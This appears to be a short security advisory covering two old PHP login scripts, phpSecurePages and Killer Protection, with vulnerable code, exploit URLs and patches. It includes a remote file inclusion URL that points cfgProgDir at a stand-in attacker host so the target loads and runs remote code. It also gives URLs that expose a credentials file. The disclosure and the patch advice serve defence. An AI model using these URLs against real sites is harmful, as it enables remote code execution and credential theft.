1) Informations : °°°°°°°°°°°°°° Product : phpSecurePages Tested version : 0.27b Website : http://www.phpsecurepages.f2s.com Problem : include file PHP Code : °°°°°°°°°° -------------- checklogin.php --------------------- if (!$login) { // no login available include($cfgProgDir . "interface.php"); exit; } if (!$password) { // no password available $message = $strNoPassword; include($cfgProgDir . "interface.php"); exit; } -------------- checklogin.php ------------------ Exploit : °°°°°°°°° http://[target]/checklogin.php?cfgProgDir=http://[attacker]/ or http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1 with http://[attacker]/interface.php . Patch : °°°°°°° Add this : $cfgProgDir = './'; at the begin of checklogin.php . More details in french : http://www.frog-man.org/tutos/phpSecurePages.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools 2) Informations : °°°°°°°°°°°°°° Product : Killer Protection Tested version : 1 Website : http://php3scripts.cjb.net Problem : Informations disclosure Exploit : °°°°°°°°° http://[target]/vars.inc and http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD] Patch : °°°°°°° rename vars.inc >> vars.inc.php . In protection.php, replace require("vars2.inc"); bye require("vars2.inc.php"); More details in french : http://www.frog-man.org/tutos/KillerProtection.txt translated by Google : http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ Affichez, modifiez et partagez gratuitement vos photos en ligne: http://photos.msn.com/support/worldwide.aspx
